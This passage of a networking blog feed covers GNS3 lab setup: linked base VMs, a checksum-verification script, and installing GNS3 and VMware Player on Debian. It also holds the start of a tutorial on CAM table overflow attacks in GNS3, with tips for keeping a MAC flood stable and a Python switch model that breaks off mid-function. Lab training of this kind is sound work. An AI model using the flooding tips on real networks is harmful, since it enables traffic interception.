data is read from the original virtual machine <span class="caps">HDD</span> image file, but all write
operations occur only on the snapshot file.</p>
<p><span class="lb-small"><a href="#lbs-enabled.png" id="lbs-enabled.png-thumb" title="Click to enlarge"><img alt="Linked based VMs enabled" src="https://www.whitewinterwolf.com/posts/2017/08/14/gns3-how-to-add-virtual-machines-end-devices-nodes/lbs-enabled.png"/></a></span></p>
<p>If you add several end devices nodes referring to the same linked base <span class="caps">VM</span>,
whether in the same topology or in different ones, each one has its own
snapshot file, meaning that each one is independent from the others.</p>
<div class="admonition warning">
<p class="admonition-title">Warning</p>
<p>When using linked base VMs, any modification of the base virtual machine,
the one initially created and serving as a base for all snapshots, would
irremediably invalidate all snapshot files and corrupt all associated end
device nodes in your topologies.</p>
<p>To avoid any wrong manipulation of the base virtual machine, <span class="caps">GNS3</span>
automatically proposes to copy it in its own directory tree.
Depending on the virtual machine size, the operation may take several
minutes but is recommended.</p>
<p>You are then free to use the original standalone virtual machine as you
like.
For instance you may want to use it as a master copy, to regularly generate
new updated versions of this virtual machine as new <span class="caps">GNS3</span> end devices nodes.</p>
</div>
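<p>Two checks discussed in this post rest on the same file-checksum routine: the hash an appliance template uses to make sure you provided the right image (see <a href="#gns3-appliances">GNS3 appliances</a> above, and the temptation to edit that hash out of the template), and the need to notice that a linked base VM's disk image was altered after its overlays were created, since the warning above says that silently breaks every node built on it. The following shell script is an added example, not code from the original post nor from GNS3: <code>verify_image</code> compares a file against the size and MD5 digest a template lists for it (an assumption here: the post only says the template stores a filename and a hash), and <code>record_base</code>/<code>check_base</code> store a SHA-256 digest of the base image beside it and report whether it has changed since. The function names and the <code>.sha256</code> sidecar file are assumptions made here.</p>

```shell
#!/bin/sh
# Added example, not part of the original post or of GNS3 itself.
# Two checks built on one file-checksum routine:
#  - verify_image: compare an image file against the size and MD5 digest an
#    appliance template expects (assumed fields; the post only says "a hash"),
#    i.e. the check that is bypassed when the hash is edited out of a template;
#  - record_base / check_base: remember the SHA-256 of a linked-base VM disk when
#    its overlays are created and detect later that the base was altered, which
#    would silently invalidate every overlay built on it.
# Function names and the ".sha256" sidecar file are assumptions made here.

# file_md5 FILE / file_sha256 FILE: print the hex digest only.
file_md5()    { md5sum "$1" | cut -d' ' -f1; }
file_sha256() { sha256sum "$1" | cut -d' ' -f1; }

# file_size FILE: size in bytes ("wc -c <" is portable, unlike "stat -c").
file_size() { wc -c < "$1" | tr -d ' '; }

# verify_image FILE EXPECTED_MD5 EXPECTED_SIZE
# Returns 0 when both match, 1 on a size mismatch, 2 on a digest mismatch.
# The size is compared first because it is free, so an obviously wrong file
# fails before the whole image is hashed.
verify_image() {
    file="$1"; want_md5="$2"; want_size="$3"
    size=$(file_size "$file")
    if [ "$size" != "$want_size" ]; then
        printf '%s: size %s bytes, template expects %s\n' "$file" "$size" "$want_size" >&2
        return 1
    fi
    have_md5=$(file_md5 "$file")
    if [ "$have_md5" != "$want_md5" ]; then
        printf '%s: md5 %s, template expects %s\n' "$file" "$have_md5" "$want_md5" >&2
        return 2
    fi
    return 0
}

# record_base BASE: store BASE's SHA-256 in BASE.sha256, to be run once right
# after the overlays (qemu-img create -o backing_file=BASE ...) are created.
record_base() { file_sha256 "$1" > "$1.sha256"; }

# check_base BASE: 0 if BASE still matches its recorded digest, 1 if it changed
# (its overlays can no longer be trusted), 2 if no digest was ever recorded.
check_base() {
    base="$1"
    if [ ! -f "$base.sha256" ]; then
        printf 'no recorded digest for %s, run record_base first\n' "$base" >&2
        return 2
    fi
    if [ "$(file_sha256 "$base")" = "$(cat "$base.sha256")" ]; then
        return 0
    fi
    printf '%s changed since its overlays were created\n' "$base" >&2
    return 1
}
```

<p>Typical use, with the file names from the post: after <code>qemu-img create -f qcow2 -o backing_file=original-file.qcow2 snapshot-file.qcow2</code>, run <code>record_base original-file.qcow2</code> once, then <code>check_base original-file.qcow2</code> before starting a topology that depends on it. For appliance templates, copy the expected digest and size out of the template file and call <code>verify_image image.bin &lt;digest&gt; &lt;size&gt;</code> on the file you found, which tells you whether it is the one the template was built for rather than merely one with the same name.</p>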
<h3 id="create-your-own-virtual-machines"><a class="toclink" href="#create-your-own-virtual-machines">Create your own virtual machines</a></h3>
<h4 id="install-the-os-outside-of-gns3"><a class="toclink" href="#install-the-os-outside-of-gns3">Install the <span class="caps">OS</span> outside of <span class="caps">GNS3</span></a></h4>
<p>Usually, you can just begin by creating a standalone virtual machine the usual
way, then import it into <span class="caps">GNS3</span> as described <a href="#standalone-virtual-machines">above</a>.</p>
<p>However, if you are using Qemu and depending on your settings this can induce a
change in your virtual hardware properties that your guest system may not like
(either because of technical reasons like Windows’ <em>Fast Startup</em> feature or
due to license issues as this may be identified as a new computer).</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>VMware Player virtual machines are less prone to such issues as the virtual
machine settings are directly handled by the Player, not by <span class="caps">GNS3</span>.</p>
</div>
<p>In case of issues, ensure that similar Qemu options are used both inside and
outside <span class="caps">GNS3</span>.
Right-clicking on a running Qemu <span class="caps">VM</span> node and using the <em>Command line</em> option
shows you the complete Qemu command used by <span class="caps">GNS3</span> to start this guest.
New options can be added in the <span class="caps">VM</span> node settings, under the <em>Advanced settings</em> tab.</p>
<p>Check in particular the <code>-cpu</code> option: ensuring that you keep the same <span class="caps">CPU</span> type
both inside and outside <span class="caps">GNS3</span> solves a lot of issues (<span class="caps">GNS3</span> does not use this
option by default).</p>
<h4 id="install-the-os-from-within-gns3"><a class="toclink" href="#install-the-os-from-within-gns3">Install the <span class="caps">OS</span> from within <span class="caps">GNS3</span></a></h4>
<p>For particularly tricky cases or if you prefer doing it this way, you can
install the guest operating system directly from within <span class="caps">GNS3</span>:</p>
<ol>
<li>
<p>Start by creating a new <span class="caps">GNS3</span> node device.
When asked to select the disk image file, select the <em>New Image</em> option
which should provide you access to the <em>Create</em> button allowing you to
create a new, empty disk image file.</p>
</li>
<li>
<p>Ensure that the imported virtual machine does <em>not</em> use linked base <span class="caps">VM</span>.
To check this, from the <span class="caps">GNS3</span> toolbar, go in <em>Edit</em> > <em>Preferences</em>, select
your virtual machine, <em>Edit</em> it and, below the <em>Advanced settings</em> tab,
check that <em>Use as a linked base <span class="caps">VM</span></em> is unchecked.</p>
<p><span class="lb-small"><a href="#no-linked-base-vm.png" id="no-linked-base-vm.png-thumb" title="Click to enlarge"><img alt="Screenshot: Uncheck 'Use as a linked base VM'" src="https://www.whitewinterwolf.com/posts/2017/08/14/gns3-how-to-add-virtual-machines-end-devices-nodes/no-linked-base-vm.png"/></a></span></p>
</li>
<li>
<p>Still in the virtual machine setting window, set any supplementary
settings like:</p>
<ul>
<li>The number of vCPUs (a minimum of 2 is usually recommended).</li>
<li>The <span class="caps">RAM</span> amount (2 <span class="caps">GB</span> is a common choice).</li>
<li>The console type (usually <span class="caps">VNC</span>)</li>
<li>
<p>Any supplementary required parameters.
When using <span class="caps">VNC</span> displays you usually also need to enable the <span class="caps">USB</span> tablet
device, set the keyboard layout and remove the default <code>-nographic</code>
option.</p>
<p>Your <em>Options</em> field should now contain something like:</p>
<div class="codehilite"><pre>-usbdevice tablet -k fr
</pre></div>
</li>
</ul>
</li>
<li>
<p>Mount the installation <span class="caps">CD</span>-<span class="caps">ROM</span> image into the guest system.</p>
</li>
<li>
<p>Create a new topology and add only this device.</p>
<p>If you need Internet connectivity during the installation process, also add
a <em>Cloud</em> node and an <em>Ethernet switch</em> node, as Qemu nodes cannot be
directly linked to Cloud nodes.</p>
</li>
<li>
<p>Proceed with the guest operating system installation as usual.</p>
</li>
<li>
<p>Once the installation has ended, re-enable the <em>Use as a linked base <span class="caps">VM</span></em>
option, delete the temporary topology used for the <span class="caps">OS</span> installation and,
optionally, remove the installation <span class="caps">ISO</span> file from the virtual <span class="caps">CD</span>-<span class="caps">ROM</span> reader.</p>
</li>
</ol>
How to install GNS3 and VMware Player on Linux (Debian) 2017-08-12T00:00:00+02:00 2017-08-19T00:00:00+02:00 WhiteWinterWolf tag:www.whitewinterwolf.com,2017-08-12:/posts/2017/08/12/how-to-install-gns3-and-vmware-player-on-linux-debian/
<p>While installing <span class="caps">GNS3</span> and VMware should be easy, it is in fact very easy to lose
a lot of time on silly issues.</p>
<ul>
<li>
<p>If you are interested only in installing VMware Player, feel free to go
directly to the corresponding part.</p>
</li>
<li>
<p>If you are interested in installing <span class="caps">GNS3</span>, I also recommend installing VMware
Player as some appliances may require it.</p>
</li>
</ul>
<p><a href="https://www.youtube.com/watch?v=jRFskkpqndA" rel="external" title="Top secret GNS3 study tips (YouTube)">RouterGods</a> also shared a few tips on how to set up a more comfortable <span class="caps">GNS3</span>
lab.
Take a few minutes to check it once you’ve finished the installation!</p>
<h3 id="installing-gns3"><a class="toclink" href="#installing-gns3">Installing <span class="caps">GNS3</span></a></h3>
<p><span class="caps">GNS3</span> relies on Linux kernel features.
If you are not a Linux user, the recommended way to use <span class="caps">GNS3</span> is to use the
<a href="https://gns3.com/software/download-vm" rel="external" title="More information on the GNS3 official virtual machine"><span class="caps">GNS3</span> official virtual machine</a>.
This virtual machine may also be a good solution if you are a Linux user but
you just want to quickly test <span class="caps">GNS3</span> or do not want to modify your host environment.</p>
<p>For a regular usage of <span class="caps">GNS3</span>, I recommend setting up a dedicated lab machine.
You can see <a href="/posts/2017/08/11/how-to-build-a-virtual-pentest-lab/" title="How to build a virtual lab">this post</a> for more information on this topic.</p>
<p>This article is based on the official <a href="http://docs.gns3.com/1QXVIihk7dsOL7Xr7Bmz4zRzTsJ02wklfImGuHwTlaA4/" rel="external" title="GNS3 Installation on Linux"><span class="caps">GNS3</span> installation guide</a>,
focused on Debian systems and with a few additions where necessary.</p>
<h4 id="installation-process"><a class="toclink" href="#installation-process">Installation process</a></h4>
<p><span class="caps">GNS3</span> uses the same packages for Ubuntu and for Debian.
If you are using Debian, you must therefore edit the package sources to point
directly to <span class="caps">GNS3</span>’s Ubuntu repository.</p>
<p>Edit the file <em>/etc/apt/sources.list</em> and add the following lines:</p>
<div class="codehilite"><pre>deb http://ppa.launchpad.net/gns3/ppa/ubuntu xenial main
deb-src http://ppa.launchpad.net/gns3/ppa/ubuntu xenial main
</pre></div>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Here I’m assuming that you are using Debian 9 <em>Stretch</em> which matches
Ubuntu 16.04 <em>Xenial</em>.</p>
<p>To know which Ubuntu repository matches your Debian version, check the
<a href="http://docs.gns3.com/1QXVIihk7dsOL7Xr7Bmz4zRzTsJ02wklfImGuHwTlaA4/" rel="external" title="GNS3 Installation on Linux"><span class="caps">GNS3</span> official installation guide</a>.</p>
</div>
<p>Now you must import the key which allows your Debian host to verify the
authenticity of <span class="caps">GNS3</span> packages, and then install these packages:</p>
<div class="codehilite"><pre>sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys F88F6D313016330404F710FC9A2FD067A2E3EF7B
sudo aptitude update
sudo aptitude install gns3-gui vncviewer
</pre></div>
<p>To enable Qemu virtual machine support, also install the following packages
(<span class="caps">GNS3</span> uses <span class="caps">VNC</span> Viewer to display a Qemu virtual host node terminal):</p>
<div class="codehilite"><pre>sudo aptitude install qemu vncviewer
</pre></div>
<p>If you need to recompile Dynamips from the sources (for instance to apply
the patches I mention in <a href="/posts/2016/06/26/how-to-run-a-cam-table-overflow-attack-in-gns3/" title="How to run a CAM table overflow attack in GNS3">this post</a>), you also need the following packages:</p>
<div class="codehilite"><pre>sudo aptitude install build-essential cmake libelf-dev libpcap0.8-dev
</pre></div>
<p>A few supplementary notes:</p>
<ul>
<li>
<p>During the Wireshark installation process (it comes as a <span class="caps">GNS3</span> dependency) there
is a message telling you that only members of the <em>wireshark</em> group will be
able to capture network packets.
So don’t forget to add your <span class="caps">GNS3</span> users to this group, as Wireshark is very
useful to debug the communication between two guests in the virtual network.</p>
<p>If you installed Qemu, you may also need to add these users to either the
<em>kvm</em> or the <em>libvirtd</em> group (depending on your distribution, check your
<em>/etc/group</em> file) to be able to use hardware-assisted virtualization.</p>
</li>
<li>
<p><span class="caps">GNS3</span> is very sensitive to the locale configuration.
If you encounter a <em>“could not find a default locale”</em> error message,
launch it while setting an explicit locale value (use <code>locale -a</code> to list
the locales available on your system):</p>
<div class="codehilite"><pre><span class="nv">LC_ALL</span><span class="o">=</span>en_US.UTF8 gns3
</pre></div>
</li>
<li>
<p>The <span class="caps">GNS3</span> <span class="caps">GUI</span> process can be launched as a background task (<code>gns3 &</code>), but
for some reason you may then encounter freezes, in particular when starting Qemu
virtual machines.
So prefer to leave it running as a foreground task in its own terminal.</p>
</li>
</ul>
<h3 id="vmware-player-installation"><a class="toclink" href="#vmware-player-installation">VMware Player installation</a></h3>
<p>VMware Player is closed-source and, therefore, might seem a bit unclean
in an otherwise open-source lab platform.
But for now it is still a de-facto standard and I consider it a necessary
evil.
For more information, see my post on <a href="/posts/2017/08/11/how-to-build-a-virtual-pentest-lab/#vmware-player" title="How to build a virtual lab: VMware Player host virtualization software">building a virtual lab</a>.</p>
<p>In case of doubts on some steps, refer to the <a href="http://docs.gns3.com/1u_D9XSSA5PVFrOrTWSw1Vn8Utvimd6ksv76F7731N84/" rel="external" title="Adding VMware VMs to GNS3 Topologies"><span class="caps">GNS3</span> official documentation</a>.</p>
<h4 id="installation-process_1"><a class="toclink" href="#installation-process_1">Installation process</a></h4>
<p>VMware does not rely on the Linux kernel virtualization functionalities (<span class="caps">KVM</span>);
instead it installs its own kernel modules.
But to be compatible with your kernel, it has to build them against your
current kernel headers.</p>
<p>First, you need to ensure that your system is correctly updated, notably to
avoid any mismatch between the currently running kernel and the installed header files:</p>
<div class="codehilite"><pre>sudo aptitude safe-upgrade
</pre></div>
<p>Then, install the dependencies required to build the VMware modules:</p>
<div class="codehilite"><pre>sudo aptitude install build-essential linux-headers-amd64
</pre></div>
<p>Download and install the following VMware components (as of now none of these
links require registration):</p>
<ul>
<li><a href="https://my.vmware.com/en/web/vmware/free#desktop_end_user_computing/vmware_workstation_player/12_0" rel="external" title="VMware Player download page">VMware Player</a></li>
<li><a href="https://www.vmware.com/support/developer/vix-api/" rel="external" title="VMware VIX API download page">VMware <span class="caps">VIX</span> <span class="caps">API</span> (<span class="caps">SDK</span>)</a> (required for <span class="caps">GNS3</span> - VMware interoperability).</li>
</ul>
<p>VMware assumes that you can run <span class="caps">GUI</span> applications as the <em>root</em> user.
If this is not the case in your environment, use the command below to compile
and install VMware modules:</p>
<div class="codehilite"><pre><span class="nv">DISPLAY</span><span class="o">=</span> sudo vmware-modconfig --install-all
</pre></div>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Several websites mention a <code>--console</code> option, but it does not seem
supported anymore.</p>
</div>
<p>Restart your machine to ensure that all installed files are correctly loaded:</p>
<div class="codehilite"><pre>sudo shutdown -r now
</pre></div>
<p><span class="caps">GNS3</span> is not able to create the virtual network adapters used by VMware virtual
machines on the fly, so you must create them beforehand using the following
command (it needs to be run only once, as part of the installation process):</p>
<div class="codehilite"><pre>sudo gns3vmnet -r <span class="m">10</span> 39
</pre></div>
<p>This will create 30 virtual network adapters which should be enough for most
situations.
Feel free to decrease or increase the last parameter value depending on your needs.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>To remove those virtual interfaces, use the following command:</p>
<div class="codehilite"><pre>sudo gns3vmnet -C
</pre></div>
</div>
<p>Now start <span class="caps">GNS3</span>, then from the menu bar go to <em>Edit</em> > <em>Preferences</em> > <em>VMware</em> and
set the following settings:</p>
<ul>
<li><em>Path to vmrun</em> should be configured automatically on a sane installation.</li>
<li><em>Host type</em>: set this to <em>VMware Player</em>.</li>
<li>In the <em>Network</em> tab, set the VMnet range to match the <code>gns3vmnet</code> parameters
(<em>vmnet10</em> to <em>vmnet39</em> in the previous example).</li>
</ul>
<p><span class="lb-small"><a href="#vmware-settings.png" id="vmware-settings.png-thumb" title="Click to enlarge"><img alt="Screenshot: VMware settings" src="https://www.whitewinterwolf.com/posts/2017/08/12/how-to-install-gns3-and-vmware-player-on-linux-debian/vmware-settings.png"/></a></span></p>
<h4 id="unsing-vmware-images-in-gns3"><a class="toclink" href="#unsing-vmware-images-in-gns3">Using VMware images in <span class="caps">GNS3</span></a></h4>
<p>You may encounter a few pitfalls when using VMware images in <span class="caps">GNS3</span>.
I describe here the main ones with their solution.</p>
<h5 id="import-a-vmware-image-into-gns3"><a class="toclink" href="#import-a-vmware-image-into-gns3">Import a VMware image into <span class="caps">GNS3</span></a></h5>
<p>Two things must be kept in mind when importing a VMware image into <span class="caps">GNS3</span>:</p>
<ul>
<li>
<p>To be detected by <span class="caps">GNS3</span>, VMware images must be stored in the VMware Player home
directory: <em>~/vmware</em>.</p>
</li>
<li>
<p>In the <span class="caps">GNS3</span> topology, open the host node configuration screen and,
under the <em>Network</em> tab, do not forget to check the
<em>Allow <span class="caps">GNS3</span> to use any configured VMware adapter</em> option.</p>
</li>
</ul>
<h5 id="installation-of-the-vmware-tools-in-the-guests"><a class="toclink" href="#installation-of-the-vmware-tools-in-the-guests">Installation of the VMware tools in the guests</a></h5>
<p>Some Linux distributions already provide a more up-to-date alternative to
VMware default tools.
Search your guest’s package repository for a package named
<em>open-vm-tools</em> or <em>open-vm-tools-desktop</em>.</p>
<p>Otherwise, you will have to install the default VMware tools.
They are not provided with the VMware Player installation archive, and VMware
assumes (again!) that you can open a <span class="caps">GUI</span> as <em>root</em>.</p>
<p>You can use my <em><a href="https://www.whitewinterwolf.com/posts/2017/08/12/how-to-install-gns3-and-vmware-player-on-linux-debian/vmware-gettools.sh">vmware-gettools.sh</a></em> script to
fetch and store all tools installers on your host system (run it as an
unprivileged user, it uses <code>sudo</code> internally to execute privileged commands
when required).
Then you will have access to the VMware Player menu options allowing you to
mount the tools installers in the guest as <span class="caps">CD</span>-<span class="caps">ROM</span> images.</p>
<h4 id="common-issues"><a class="toclink" href="#common-issues">Common issues</a></h4>
<p>Here are the workarounds for common issues encountered when using VMware Player.
You will find information on more issues <a href="/posts/2017/09/26/common-issues-when-using-virtual-machines/" title="Common issues when using virtual machines">here</a>.</p>
<h5 id="keyboard-issues"><a class="toclink" href="#keyboard-issues">Keyboard issues</a></h5>
<p>On some environments, the <em>AltGr</em> keyboard key may be ignored by the guest.</p>
<p>To <a href="https://communities.vmware.com/thread/172478?start=0&tstart=0#1124959" rel="external" title="no altgr functionality - linux host, xp or vista guest">solve this</a>, edit the file <em>~/.vmware/preferences</em> and add the following lines:</p>
<div class="codehilite"><pre>xkeymap.keycode.108 = 0x138 # Alt_R
xkeymap.keycode.106 = 0x135 # KP_Divide
xkeymap.keycode.104 = 0x11c # KP_Enter
xkeymap.keycode.111 = 0x148 # Up
xkeymap.keycode.116 = 0x150 # Down
xkeymap.keycode.113 = 0x14b # Left
xkeymap.keycode.114 = 0x14d # Right
xkeymap.keycode.105 = 0x11d # Control_R
xkeymap.keycode.118 = 0x152 # Insert
xkeymap.keycode.119 = 0x153 # Delete
xkeymap.keycode.110 = 0x147 # Home
xkeymap.keycode.115 = 0x14f # End
xkeymap.keycode.112 = 0x149 # Prior
xkeymap.keycode.117 = 0x151 # Next
xkeymap.keycode.78 = 0x46 # Scroll_Lock
</pre></div>
<h5 id="mouse-issues"><a class="toclink" href="#mouse-issues">Mouse issues</a></h5>
<p>Sometimes you may notice an offset between the host’s and the guest’s mouse cursor positions.</p>
<p>Using VMware Player in full-screen mode may temporarily solve the issue.</p>
<p>For a more permanent fix, you need to define a fixed screen size in the virtual
machine configuration.</p>How to run a CAM table overflow attack in GNS32016-06-26T00:00:00+02:002017-08-19T00:00:00+02:00WhiteWinterWolftag:www.whitewinterwolf.com,2016-06-26:/posts/2016/06/26/how-to-run-a-cam-table-overflow-attack-in-gns3/<h3 id="knowing-where-difference-with-real-gears-lies"><a class="toclink" href="#knowing-where-difference-with-real-gears-lies">Knowing where the difference with real gear lies</a></h3>
<p>For performance reasons, many switching functions are actually not part of the
<span class="caps">IOS</span> code but are implemented in hardware.
This includes the <span class="caps">ARL</span>, or <a href="http://computernetworkingsimplified.com/data-link-layer/basic-theory-operation-l2-switch/" rel="external">Address Resolution Logic</a>, which provides all the
methods to add, remove and look up entries in the <span class="caps">MAC</span> address table.</p>
<p>Therefore, for the <span class="caps">NM</span>-<span class="caps">16ESW</span> module to work in <span class="caps">GNS3</span>, Dynamips had to reimplement
all these services normally provided by the hardware, or at least push this far enough
to allow an unmodified <span class="caps">IOS</span> to run on it correctly.</p>
<p>The sad thing is indeed that this is unfinished work, as stated in this
<a href="https://github.com/GNS3/dynamips/blob/master/common/dev_nm_16esw.c" rel="external">module’s source code</a> header:</p>
<div class="codehilite"><pre><span class="cm">/*</span>
<span class="cm"> * Cisco router simulation platform.</span>
<span class="cm"> * Copyright (c) 2006 Christophe Fillot (cf@utc.fr)</span>
<span class="cm"> *</span>
<span class="cm"> * NM-16ESW ethernet switch module (experimental!)</span>
<span class="cm"> *</span>
<span class="cm"> * It's an attempt of proof of concept, so not optimized at all at this time.</span>
<span class="cm"> * Only L2 switching will be managed (no L3 at all).</span>
<span class="cm"> *</span>
<span class="cm"> * To do next: QoS features (CoS/DSCP handling).</span>
<span class="cm"> */</span>
</pre></div>
<p>So you’re warned: forget about QoS and expect some oddities.</p>
<p>Fortunately, here we are not dealing with QoS but with <span class="caps">CAM</span> overflow, and apart from
the final bug (whose correction should be included in a future version
of <span class="caps">GNS3</span>) there are two main oddities which are of concern to us: one
affects the <span class="caps">MAC</span> address table size and the other the <span class="caps">MAC</span> address aging process.</p>
<h4 id="first-difference-the-mac-address-table-size-tops-at-8189-entries"><a class="toclink" href="#first-difference-the-mac-address-table-size-tops-at-8189-entries">First difference: the <span class="caps">MAC</span> address table size tops at 8189 entries</a></h4>
<p>This is actually a non-issue.</p>
<p>The <span class="caps">CAM</span> overflow attack exploits the fact that a switch is not able to add any
new entry to its <span class="caps">CAM</span> table, and therefore falls back into <em>“behaving like a hub”</em>
(as it is often described; I’ll come back to this later).</p>
<p>Most probably due to a minor bug, it seems that the <span class="caps">MAC</span> table is considered
full at 8189 entries instead of 8192. However, full still means full: the <span class="caps">ARL</span>
should still fail to store any supplementary entry and the <span class="caps">CAM</span> overflow attack
should still be successful.</p>
<h4 id="second-difference-the-aging-time-setting-is-not-honored"><a class="toclink" href="#second-difference-the-aging-time-setting-is-not-honored">Second difference: the <code>aging-time</code> setting is not honored</a></h4>
<p>By default, <span class="caps">MAC</span> entries should remain in the <span class="caps">MAC</span> address table for at least 5
minutes (=300 seconds), as defined by the <code>aging-time</code> setting:</p>
<div class="codehilite"><pre><span class="go">SW1#show mac-address-table aging-time</span>
<span class="go">Mac address aging time 300</span>
</pre></div>
<p>However, in real gear the whole process behind this parameter is implemented in
hardware, and this setting is currently simply ignored by Dynamips’
implementation of the <span class="caps">NM</span>-<span class="caps">16ESW</span> module.</p>
<p>Dynamips implements its own garbage collection system which deletes old <span class="caps">MAC</span>
entries after only 30 seconds, making <span class="caps">CAM</span> overflow attacks noticeably more
tricky to stabilize (but this may be good training against the <em>“backpressure”</em>
functionality, designed to allow faster <span class="caps">MAC</span> aging when there is a flood of new
addresses, according to <a href="https://networkengineering.stackexchange.com/a/20319/27387" rel="external">Lukasz</a>).</p>
<p>The code in charge of this can be found around line 2515 of the
<a href="https://github.com/GNS3/dynamips/blob/master/common/dev_nm_16esw.c" rel="external">dev_nm_16esw.c</a> file:</p>
<div class="codehilite"><pre><span class="cm">/* Start the MAC address ager */</span>
<span class="n">data</span><span class="o">-></span><span class="n">ager_tid</span> <span class="o">=</span> <span class="n">timer_create_entry</span><span class="p">(</span><span class="mi">15000</span><span class="p">,</span><span class="n">FALSE</span><span class="p">,</span><span class="mi">10</span><span class="p">,</span>
<span class="p">(</span><span class="n">timer_proc</span><span class="p">)</span><span class="n">bcm5600_arl_ager</span><span class="p">,</span><span class="n">data</span><span class="p">);</span>
</pre></div>
<p>This launches the <code>bcm5600_arl_ager()</code> function every 15 seconds. What this
function does is to scan the whole <span class="caps">CAM</span> table and check a hit flag associated with
each <span class="caps">MAC</span> address:</p>
<ul>
<li>If the flag is set, unset it.</li>
<li>If the flag is unset, delete the <span class="caps">MAC</span> address from the table.</li>
</ul>
<p>This flag is re-enabled whenever the switch receives a new packet from the
corresponding <span class="caps">MAC</span> address, keeping active addresses in the table.</p>
<p>You <em>will</em> have to take this behavior into account in order to design a
successful <span class="caps">CAM</span> overflow attack:</p>
<ul>
<li>
<p>Using only random <span class="caps">MAC</span> addresses will not do it (sorry <code>macof</code>…) since it
would allow the switch to flush all faked addresses at once every 30
seconds, making the exploit unstable.</p>
</li>
<li>
<p>Each <span class="caps">MAC</span> address must be used as a sender at least once every 15 seconds.</p>
</li>
<li>
<p>Actually, because the increased load may cause a single packet to be lost or to
arrive late, you would rather have each <span class="caps">MAC</span>
address used two or three times in less than 15 seconds.
This should be enough to make your flood both stable and reliable, with <span class="caps">CAM</span>
tables consistently and constantly filled on all switches on the whole <span class="caps">LAN</span>.</p>
</li>
</ul>
<h3 id="understanding-what-you-can-really-expect"><a class="toclink" href="#understanding-what-you-can-really-expect">Understanding what you can really expect</a></h3>
<p>As explained in the introduction, a lot of literature explains this attack as
<em>“making the switch behave like a hub”</em>. While a good overview for the layman,
this oversimplified description is wrong from a technical point of view.</p>
<p>To explain this I will first detail how a switch works under normal
circumstances, that is, the algorithm behind it:</p>
<ol>
<li>
<p>The switch receives an incoming packet on some port,</p>
</li>
<li>
<p>The switch then checks if the source <span class="caps">MAC</span> address is already stored in the
<span class="caps">MAC</span> address table.
If it isn’t and there is a free slot, it records this new <span class="caps">MAC</span> address
associated with its incoming port (and by the way, if the address is already
present but associated with another port, it will update the record with the
new port).
This is also the occasion to reset the aging timer associated with this entry,
whether it is new or not.</p>
</li>
<li>
<p>The switch then checks if the destination <span class="caps">MAC</span> address is already stored in
the <span class="caps">MAC</span> address table. If it is, then this is all good and the switch
outputs the packet on the interface associated to the matching <span class="caps">CAM</span> table
entry.
If it isn’t, the switch outputs the packet on all interfaces except the
incoming one (all interfaces belonging to the same <span class="caps">VLAN</span> + trunk ports as
long as this <span class="caps">VLAN</span> is not pruned).</p>
</li>
</ol>
<p>Now, let’s see how a switch works when the <span class="caps">CAM</span> overflow condition has been
triggered and it has fallen back into the so-called <em>“hub”</em> mode…
Actually all of this is just nonsense: there is no hub mode and the <span class="caps">CAM</span>
overflow triggered strictly nothing.
The switch just continues to work as it always did:</p>
<ol>
<li>
<p>On incoming packets, <em>if and only if</em> the source <span class="caps">MAC</span> address is not present
in the table will the <span class="caps">CAM</span> overflow have any effect since the switch will
have no free slot to add this new one and will therefore skip this step.
If the address is already present in the table, the switch will reset its
aging timer as usual.</p>
</li>
<li>
<p>On outgoing packets, <em>if and only if</em> the destination <span class="caps">MAC</span> address is not
present in the table will the switch indeed send the packet through “all”
of its interfaces.
If the <span class="caps">MAC</span> address is present in the table, the switch has strictly no
reason to act weirdly: it will simply proceed as usual and send the packet
only through the port associated to the <span class="caps">MAC</span> address.</p>
</li>
</ol>
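As an added illustration (not code from the post, from Dynamips or from any switch vendor), here is a small Python model of the two behaviours described above: the hit-flag ager of <code>dev_nm_16esw.c</code> (a pass every 15 seconds, eviction after two passes without a frame from the source) and the learn-then-forward steps of a switch whose table is full. The 4-slot table, the port numbers, the timings and the MAC addresses are constructed for the demo; <code>TABLE_SIZE</code> only mirrors the 8189 figure quoted earlier.

```python
from dataclasses import dataclass

AGER_PERIOD = 15    # seconds between two bcm5600_arl_ager() passes, as quoted from Dynamips
TABLE_SIZE = 8189   # entries at which the emulated NM-16ESW considers its table full


@dataclass
class Entry:
    port: int
    hit: bool = True    # set on every frame received from this source MAC


class ModelSwitch:
    """Learning switch with a capped MAC table and a hit-flag ager (constructed model)."""

    def __init__(self, ports, table_size=TABLE_SIZE, ager_period=AGER_PERIOD):
        self.ports = set(ports)
        self.table_size = table_size
        self.ager_period = ager_period
        self.table = {}             # source MAC -> Entry
        self.next_ager = ager_period
        self.learn_failures = 0     # source MACs not learned because the table was full

    def tick(self, now):
        """Run every ager pass that is due at time `now` (seconds since start)."""
        while self.next_ager <= now:
            for mac, entry in list(self.table.items()):
                if entry.hit:
                    entry.hit = False    # seen since the last pass: keep one more period
                else:
                    del self.table[mac]  # idle for a whole period: evict
            self.next_ager += self.ager_period

    def frame(self, now, in_port, src, dst):
        """Process one frame received at `now` on `in_port`; return the egress ports."""
        self.tick(now)
        # Step 1: learn or refresh the source address.
        entry = self.table.get(src)
        if entry is not None:
            entry.port, entry.hit = in_port, True
        elif len(self.table) < self.table_size:
            self.table[src] = Entry(in_port)
        else:
            self.learn_failures += 1    # the only thing a full table changes
        # Step 2: forward according to the destination address.
        dst_entry = self.table.get(dst)
        if dst_entry is not None:
            return {dst_entry.port}     # known destination: unicast, full table or not
        return self.ports - {in_port}   # unknown destination: flood


def address_survives(send_times, check_time):
    """Is a source that transmitted at `send_times` still in the table at `check_time`?"""
    mac = "02:00:00:00:00:aa"
    sw = ModelSwitch(ports={1, 2})
    for t in sorted(send_times):
        sw.frame(t, 1, mac, "ff:ff:ff:ff:ff:ff")
    sw.tick(check_time)
    return mac in sw.table


ROUTER, SERVER, LAPTOP = "02:00:00:00:00:01", "02:00:00:00:00:02", "02:00:00:00:00:03"


def full_table_behaviour():
    """Replay the post's scenario on a 4-slot table and record what each frame does."""
    sw = ModelSwitch(ports={1, 2, 3, 4}, table_size=4)
    sw.frame(0, 1, ROUTER, SERVER)      # router (port 1) and server (port 2) are active
    sw.frame(0, 2, SERVER, ROUTER)
    for i in range(2):                  # two bogus sources from port 3 fill the last slots
        sw.frame(1, 3, "02:00:00:00:ff:%02x" % i, "ff:ff:ff:ff:ff:ff")
    out = {}
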